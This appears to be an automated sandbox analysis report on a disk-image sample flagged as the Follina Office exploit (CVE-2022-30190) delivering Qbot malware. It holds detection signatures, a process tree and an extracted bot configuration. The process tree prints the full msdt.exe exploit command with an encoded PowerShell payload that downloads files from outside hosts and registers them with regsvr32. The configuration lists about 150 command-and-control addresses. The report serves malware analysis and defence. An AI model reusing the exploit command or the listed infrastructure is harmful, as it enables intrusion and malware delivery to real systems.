Edit tour
Windows
Analysis Report
68101181_048154.img
Overview
General Information
Detection
CryptOne, Follina CVE-2022-30190, Qbot
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected Qbot
Yara detected CryptOne packer
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Contains capabilities to detect virtual machines
Spawns drivers
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- cmd.exe (PID: 5248 cmdline:
C:\Windows \system32\ cmd.exe /c powershel l.exe -ex bypass -co mmand Moun t-DiskImag e -ImagePa th "C:\Use rs\user\De sktop\6810 1181_04815 4.img" MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 6140 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 6088 cmdline:
powershell .exe -ex b ypass -com mand Mount -DiskImage -ImagePat h "C:\User s\user\Des ktop\68101 181_048154 .img" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
- udfs.sys (PID: 4 cmdline:
MD5: 6A442723D4D05D9F15D24C9942CDA00D)
- WINWORD.EXE (PID: 2896 cmdline:
C:\Program Files (x8 6)\Microso ft Office\ Office16\W INWORD.EXE " /n "E:\d oc276.docx " /o " MD5: 0B9AB9B9C4DE429473D6450D4297A123) - MSOSYNC.EXE (PID: 3532 cmdline:
C:\Program Files (x8 6)\Microso ft Office\ Office16\M soSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C) - MSOSYNC.EXE (PID: 1476 cmdline:
C:\Program Files (x8 6)\Microso ft Office\ Office16\M soSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C) - msdt.exe (PID: 6148 cmdline:
C:\Windows \system32\ msdt.exe" ms-msdt:/i d PCWDiagn ostic /ski p force /p aram "IT_R ebrowseFor File=? IT_ LaunchMeth od=Context Menu IT_Br owseForFil e=$(Invoke -Expressio n($(Invoke -Expressio n('[System .Text.Enco ding]'+[ch ar]58+[cha r]58+'Unic ode.GetStr ing([Syste m.Convert] '+[char]58 +[char]58+ 'FromBase6 4String('+ [char]34+' JABwACAAPQ AgACQARQBu AHYAOgB0AG UAbQBwADsA aQB3AHIAIA BoAHQAdABw ADoALwAvAD EAMAA0AC4A MwA2AC4AMg AyADkALgAx ADMAOQAvAC QAKAByAGEA bgBkAG8AbQ ApAC4AZABh AHQAIAAtAE 8AdQB0AEYA aQBsAGUAIA AkAHAAXAB0 AC4AQQA7AG kAdwByACAA aAB0AHQAcA A6AC8ALwA4 ADUALgAyAD MAOQAuADUA NQAuADIAMg A4AC8AJAAo AHIAYQBuAG QAbwBtACkA LgBkAGEAdA AgAC0ATwB1 AHQARgBpAG wAZQAgACQA cABcAHQAMQ AuAEEAOwBp AHcAcgAgAG gAdAB0AHAA OgAvAC8AMQ A4ADUALgAy ADMANAAuAD IANAA3AC4A MQAxADkALw AkACgAcgBh AG4AZABvAG 0AKQAuAGQA YQB0ACAALQ BPAHUAdABG AGkAbABlAC AAJABwAFwA dAAyAC4AQQ A7AHIAZQBn AHMAdgByAD MAMgAgACQA cABcAHQALg BBADsAcgBl AGcAcwB2AH IAMwAyACAA JABwAFwAdA AxAC4AQQA7 AHIAZQBnAH MAdgByADMA MgAgACQAcA BcAHQAMgAu AEEA'+[cha r]34+'))') )))i/../.. /../../../ ../../../. ./../../.. /../../Win dows/Syste m32/mpsigs tub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
- explorer.exe (PID: 6656 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
- csc.exe (PID: 7084 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe" /noco nfig /full paths @"C: \Users\use r\AppData\ Local\Temp \ej5ypzxn\ ej5ypzxn.c mdline MD5: 350C52F71BDED7B99668585C15D70EEA) - cvtres.exe (PID: 7100 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S473B.tmp" "c:\Users \user\AppD ata\Local\ Temp\ej5yp zxn\CSCDA8 FA8A1B4054 3BD93F61BB D49C66867. TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- csc.exe (PID: 7116 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe" /noco nfig /full paths @"C: \Users\use r\AppData\ Local\Temp \343kkfih\ 343kkfih.c mdline MD5: 350C52F71BDED7B99668585C15D70EEA) - cvtres.exe (PID: 5072 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S5EDA.tmp" "c:\Users \user\AppD ata\Local\ Temp\343kk fih\CSCB42 8EC43F67D4 CCE84BBCBE 165F3FF83. TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- regsvr32.exe (PID: 6408 cmdline:
"C:\Window s\system32 \regsvr32. exe" C:\Us ers\user\A ppData\Loc al\Temp\t. A MD5: 426E7499F6A7346F0410DEAD0805586B)
- regsvr32.exe (PID: 6356 cmdline:
"C:\Window s\system32 \regsvr32. exe" C:\Us ers\user\A ppData\Loc al\Temp\t1 .A MD5: 426E7499F6A7346F0410DEAD0805586B)
- regsvr32.exe (PID: 6300 cmdline:
"C:\Window s\system32 \regsvr32. exe" C:\Us ers\user\A ppData\Loc al\Temp\t2 .A MD5: 426E7499F6A7346F0410DEAD0805586B)
- csc.exe (PID: 6896 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe" /noco nfig /full paths @"C: \Users\use r\AppData\ Local\Temp \mj2renji\ mj2renji.c mdline MD5: 350C52F71BDED7B99668585C15D70EEA) - cvtres.exe (PID: 6492 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S4765.tmp" "c:\Users \user\AppD ata\Local\ Temp\mj2re nji\CSCB98 69C7619004 D828AB967D BC926ADAE. TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- cleanup
{"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694", "C2 list": ["67.165.206.193:993", "63.143.92.99:995", "74.14.5.179:2222", "182.191.92.203:995", "197.89.8.51:443", "89.101.97.139:443", "86.97.9.190:443", "124.40.244.115:2222", "80.11.74.81:2222", "41.215.153.104:995", "179.100.20.32:32101", "31.35.28.29:443", "202.134.152.2:2222", "109.12.111.14:443", "93.48.80.198:995", "120.150.218.241:995", "41.38.167.179:995", "177.94.57.126:32101", "173.174.216.62:443", "1.161.101.20:443", "88.224.254.172:443", "82.41.63.217:443", "67.209.195.198:443", "70.46.220.114:443", "24.178.196.158:2222", "39.44.213.68:995", "84.241.8.23:32103", "210.246.4.69:995", "92.132.172.197:2222", "91.177.173.10:995", "217.128.122.65:2222", "149.28.238.199:995", "45.76.167.26:995", "45.63.1.12:443", "144.202.2.175:443", "45.63.1.12:995", "144.202.3.39:995", "144.202.2.175:995", "45.76.167.26:443", "149.28.238.199:443", "144.202.3.39:443", "140.82.63.183:995", "140.82.63.183:443", "175.145.235.37:443", "85.246.82.244:443", "47.23.89.60:993", "187.207.131.50:61202", "176.67.56.94:443", "148.64.96.100:443", "140.82.49.12:443", "76.70.9.169:2222", "217.164.121.161:2222", "72.27.33.160:443", "108.60.213.141:443", "104.34.212.7:32103", "39.44.158.215:995", "31.48.174.63:2078", "75.99.168.194:61201", "117.248.109.38:21", "83.110.218.147:993", "82.152.39.39:443", "180.129.108.214:995", "5.32.41.45:443", "83.110.92.106:443", "197.164.182.46:993", "196.203.37.215:80", "186.90.153.162:2222", "37.186.54.254:995", "89.211.179.247:2222", "24.139.72.117:443", "201.142.177.168:443", "37.34.253.233:443", "69.14.172.24:443", "125.24.187.183:443", "208.107.221.224:443", "174.69.215.101:443", "76.25.142.196:443", "96.37.113.36:993", "173.21.10.71:2222", "73.151.236.31:443", "45.46.53.140:2222", "189.146.90.232:443", "70.51.135.90:2222", "190.252.242.69:443", "201.145.165.25:443", "47.157.227.70:443", "72.252.157.93:993", "177.205.155.85:443", "72.252.157.93:995", "187.251.132.144:22", "40.134.246.185:995", "24.55.67.176:443", "79.80.80.29:2222", "179.158.105.44:443", "72.252.157.93:990", "89.86.33.217:443", "201.172.23.68:2222", "102.182.232.3:995", "177.156.191.231:443", "39.49.96.122:995", "94.36.193.176:2222", "120.61.1.114:443", "217.164.121.161:1194", "39.41.29.200:995", "86.195.158.178:2222", "86.98.149.168:2222", "1.161.101.20:995", "124.109.35.32:995", "172.115.177.204:2222", "105.27.172.6:443", "32.221.224.140:995", "208.101.82.0:443", "71.24.118.253:443", "143.0.219.6:995", "217.165.176.49:2222", "90.120.65.153:2078", "5.203.199.157:995", "39.52.41.80:995", "148.0.56.63:443", "191.112.25.187:443", "121.7.223.45:2222", "47.156.131.10:443", "177.209.202.242:2222", "41.86.42.158:995", "106.51.48.170:50001", "41.84.229.240:443", "94.71.169.212:995", "111.125.245.116:995", "78.101.193.241:6883", "201.242.175.29:2222", "38.70.253.226:2222", "187.149.236.5:443", "217.165.79.88:443", "85.255.232.18:443", "103.246.242.202:443", "41.230.62.211:995", "67.69.166.79:2222", "42.228.224.249:2222", "172.114.160.81:995", "94.26.122.9:995", "75.99.168.194:443", "189.253.206.105:443", "81.215.196.174:443", "46.107.48.202:443"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard |
| |
Click to see the 1 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 | Nasreddine Bencherchali, Christian Burkard |
| |
JoeSecurity_Crypt | Yara detected CryptOne packer | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
Click to see the 14 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
Click to see the 17 entries |
⊘No Sigma rule has matched
Timestamp: | 185.234.247.119192.168.2.480497622036726 06/07/22-19:21:17.785538 |
SID: | 2036726 |
Source Port: | 80 |
Destination Port: | 49762 |
Protocol: | TCP |
Classtype: | Attempted User Privilege Gain |
Click to jump to signature section
Show All Signature Results
Source: | Malware Configuration Extractor: |